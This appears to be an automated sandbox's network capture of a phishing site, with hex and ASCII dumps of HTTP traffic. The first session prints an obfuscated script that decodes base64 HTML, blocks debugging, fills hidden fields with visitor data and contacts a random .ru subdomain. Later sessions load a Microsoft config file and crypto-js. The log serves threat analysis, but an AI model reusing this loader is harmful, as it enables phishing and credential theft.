                                                                                                                                                            2024-10-08 03:08:41 UTC1177INData Raw: 34 36 30 65 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 6a 42 5a 52 48 4a 4c 4c 6d 4e 68 63 33 52 79 59 57 64 76 64 58 4e 6c 4c 6d 4e 76 62 53 39 6d 65 6b 5a 42 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32
                                                                                                                                                            Data Ascii: 460e<script>if(atob("aHR0cHM6Ly9jbjBZRHJLLmNhc3RyYWdvdXNlLmNvbS9mekZBLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb2
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 63 48 67 70 65 77 30 4b 49 33 46 6f 53 47 70 35 54 6b 70 78 64 57 45 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 63 57 68 49 61 6e 6c 4f 53 6e 46 31 59 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 46 6f 53 47 70 35 54 6b 70 78 64 57 45 75 59 32 39 75 64 47 46 70 62 6d 56 79 65 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d
                                                                                                                                                            Data Ascii: cHgpew0KI3FoSGp5TkpxdWEgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojcWhIanlOSnF1YSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3FoSGp5TkpxdWEuY29udGFpbmVye3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnM
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 58 5a 68 62 43 67 6e 5a 47 56 69 64 57 64 6e 5a 58 49 6e 4b 54 73 4e 43 69 41 67 49 43 42 6a 62 32 35 7a 64 43 42 30 4d 53 41 39 49 45 52 68 64 47 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 77 67 4d 54 41 77 4d 43 6b 37 44 51 6f 67 49 43 41 67 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 38 4c 32 68 6c 59 57 51 2b 44 51 6f 4e 43 6a 77 68 4c 53 30 67 56 47 68 6c 49 48 4e 6c 59 33 4a 6c 64 43 42 76 5a 69 42 7a 64 57 4e 6a 5a 58 4e 7a 49 47 6c 7a 49 48 52 76 49 47 52 76 49 48 52 6f 5a 53 42 6a 62 32 31 74 62 32 34 67 64 47 68 70 62 6d 63 67 64 57 35 6a 62 32 31 74 62 32 35 73 65 53 42 33 5a 57 78 73 4c 69 41 74 4c 54 34 4b 50 47 4a 76 5a 48 6b 67 63 33 52 35 62 47 55 39 49 6d 5a 76 62 6e 51 74 5a 6d 46 74 61 57 78 35 4f 69 42 68 63 6d 6c 68
                                                                                                                                                            Data Ascii: XZhbCgnZGVidWdnZXInKTsNCiAgICBjb25zdCB0MSA9IERhdGUubm93KCk7DQogICAgfSwgMTAwMCk7DQogICAgPC9zY3JpcHQ+DQo8L2hlYWQ+DQoNCjwhLS0gVGhlIHNlY3JldCBvZiBzdWNjZXNzIGlzIHRvIGRvIHRoZSBjb21tb24gdGhpbmcgdW5jb21tb25seSB3ZWxsLiAtLT4KPGJvZHkgc3R5bGU9ImZvbnQtZmFtaWx5OiBhcmlh
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 45 74 4c 53 42 54 64 57 4e 6a 5a 58 4e 7a 49 47 6c 7a 49 47 35 76 64 43 42 6f 62 33 63 67 61 47 6c 6e 61 43 42 35 62 33 55 67 61 47 46 32 5a 53 42 6a 62 47 6c 74 59 6d 56 6b 4c 43 42 69 64 58 51 67 61 47 39 33 49 48 6c 76 64 53 42 74 59 57 74 6c 49 47 45 67 63 47 39 7a 61 58 52 70 64 6d 55 67 5a 47 6c 6d 5a 6d 56 79 5a 57 35 6a 5a 53 42 30 62 79 42 30 61 47 55 67 64 32 39 79 62 47 51 75 49 43 30 74 50 67 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61
                                                                                                                                                            Data Ascii: duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPCEtLSBTdWNjZXNzIGlzIG5vdCBob3cgaGlnaCB5b3UgaGF2ZSBjbGltYmVkLCBidXQgaG93IHlvdSBtYWtlIGEgcG9zaXRpdmUgZGlmZmVyZW5jZSB0byB0aGUgd29ybGQuIC0tPgo8L2Rpdj4NCjxka
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 6f 64 48 52 77 63 7a 6f 76 4c 32 78 79 53 54 5a 43 4d 56 56 4e 52 55 31 48 63 33 70 6d 61 54 41 77 62 6c 56 71 54 58 4e 4e 57 47 4a 78 62 32 56 7a 62 46 63 7a 56 33 68 56 56 44 52 75 54 6a 51 78 52 46 4e 52 5a 56 70 70 61 55 5a 75 61 46 4e 4d 53 58 52 4a 54 44 42 4b 63 53 35 30 64 57 4a 6c 59 58 64 6c 62 47 30 75 63 6e 55 76 4e 6a 63 79 4e 44 45 77 4d 7a 63 7a 4d 6a 51 34 4d 54 67 7a 4e 44 63 7a 4f 57 6c 45 53 6b 74 34 53 57 52 57 52 6c 52 42 55 31 52 50 51 31 4a 56 51 6b 6c 4d 56 45 35 44 52 55 31 46 54 6c 6c 56 52 45 46 47 56 45 39 55 56 56 4a 47 55 6b 74 4b 55 56 5a 46 54 45 39 61 54 55 70 4c 55 43 63 73 49 48 73 4e 43 69 41 67 49 43 42 74 5a 58 52 6f 62 32 51 36 49 43 4a 48 52 56 51 69 4c 41 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d
                                                                                                                                                            Data Ascii: odHRwczovL2xySTZCMVVNRU1Hc3pmaTAwblVqTXNNWGJxb2VzbFczV3hVVDRuTjQxRFNRZVppaUZuaFNMSXRJTDBKcS50dWJlYXdlbG0ucnUvNjcyNDEwMzczMjQ4MTgzNDczOWlESkt4SWRWRlRBU1RPQ1JVQklMVE5DRU1FTllVREFGVE9UVVJGUktKUVZFTE9aTUpLUCcsIHsNCiAgICBtZXRob2Q6ICJHRVQiLA0KICAgIH0pLnRoZW4ocm
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0d 0a 52 57 56 76 62 55 43 78 69 6c 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 52 57 56 76 62 55 43 78 69 6c 29 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 6a 42 5a 52 48 4a 4c 4c 6d 4e 68 63 33 52 79 59 57 64 76 64 58 4e 6c 4c 6d 4e 76 62 53 39 6d 65 6b 5a 42 4c 77 3d 3d 22 29 20 21 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 63 6f 6e 73 74 20 74 56 78 53 75 55 57 4f 77 52 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 63 6f 6e 73 74 20 68 59 53 5a 4c 6a 49 4a 74 49
                                                                                                                                                            Data Ascii: document.currentScript;RWVvbUCxil.parentNode.removeChild(RWVvbUCxil);}if(atob("aHR0cHM6Ly9jbjBZRHJLLmNhc3RyYWdvdXNlLmNvbS9mekZBLw==") !== "nomatch"){const tVxSuUWOwR = window.location.hostname.split('.').slice(-2).join('.');const hYSZLjIJtI
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 62 32 78 73 62 33 63 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 6a 34 4e 43 69 41 67 49 43 41 38 64 47 6c 30 62 47 55 2b 4a 69 4d 34 4d 6a 41 7a 4f 7a 77 76 64 47 6c 30 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 30 65 57 78 6c 50 67 30 4b 59 6d 39 6b 65 53 42 37 44 51 6f 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 44 51 6f 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68
                                                                                                                                                            Data Ascii: b2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGh
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 58 56 68 49 43 35 74 64 43 30 30 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 78 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 63 57 68 49 61 6e 6c 4f 53 6e 46 31 59 53 41 6a 54 57 39 6a 63 32 5a 70 53 32 5a 73 53 79 42 37 59 32 39 73 62 33 49 36 49 43 4d 32 59 7a 63 31 4e 32 51 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 30 63 48 67 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4c 6a 56 79 5a 57 30 37 66 51 30 4b 49 43 41 67 49 44 77 76 63 33 52 35 62 47 55 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 56 6a 59 32 56 7a 63 32 5a 31 62 43 42 77 5a 57 39 77 62 47 55 67 5a 47 38 67 64 32 68 68 64 43 42 31 62 6e 4e 31 59 32 4e 6c 63 33 4e 6d 64 57 77 67 63 47 56 76 63 47 78 6c 49 47 46 79 5a 53 42 75
                                                                                                                                                            Data Ascii: XVhIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojcWhIanlOSnF1YSAjTW9jc2ZpS2ZsSyB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQo8IS0tIDxkaXY+U3VjY2Vzc2Z1bCBwZW9wbGUgZG8gd2hhdCB1bnN1Y2Nlc3NmdWwgcGVvcGxlIGFyZSBu
                                                                                                                                                            2024-10-08 03:08:41 UTC1369INData Raw: 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 42 75 59 57 31 6c 50 53 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 61 58 41 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 4e 44 51 30 4d 7a 45 33 4c
                                                                                                                                                            Data Ascii: U9ImhpZGRlbiIgaWQ9InBhZ2VsaW5rIiBuYW1lPSJwYWdlbGluayIgdmFsdWU9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGlwIiBuYW1lPSJibHRkaXAiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iaHR0cHM6Ly93d3cuNDQ0MzE3L


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.549721184.28.90.27443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:41 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                            2024-10-08 03:08:41 UTC515INHTTP/1.1 200 OK
                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                                                            X-CID: 11
                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                            Cache-Control: public, max-age=135357
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:41 GMT
                                                                                                                                                            Content-Length: 55
                                                                                                                                                            Connection: close
                                                                                                                                                            X-CID: 2
                                                                                                                                                            2024-10-08 03:08:41 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.549724104.17.25.144434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:42 UTC655OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                            Referer: https://gzevp.castragouse.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:42 UTC922INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:42 GMT
                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                            ETag: W/"61182885-40eb"
                                                                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                            Age: 417572
                                                                                                                                                            Expires: Sun, 28 Sep 2025 03:08:42 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xv5mhmTRiuJGO0ODPXGWtfe3Xfso9dywIfStZVLTR2EDlf2I3K550x7vQTs2ZqK2Cd37MTWwbpqRGue50N51GtW7ltooAzorSc8mrZnG5rG8w4vzYQmJYrHzuZoScI8jnBobX76Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ed8ded4832e2-EWR
                                                                                                                                                            2024-10-08 03:08:42 UTC447INData Raw: 37 63 30 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                            Data Ascii: 7c05!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 3d 74
                                                                                                                                                            Data Ascii: lThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 28 34 29 2e 72 65 61 64 49 6e 74 33
                                                                                                                                                            Data Ascii: slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt3
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 61 29 3b 65 3d 69 2e 73
                                                                                                                                                            Data Ascii: cat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.s
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e
                                                                                                                                                            Data Ascii: [r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+886263092+(e[4]>>>
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d 3c 3c 38 7c 49 5b 32 5d 3e 3e 3e 32
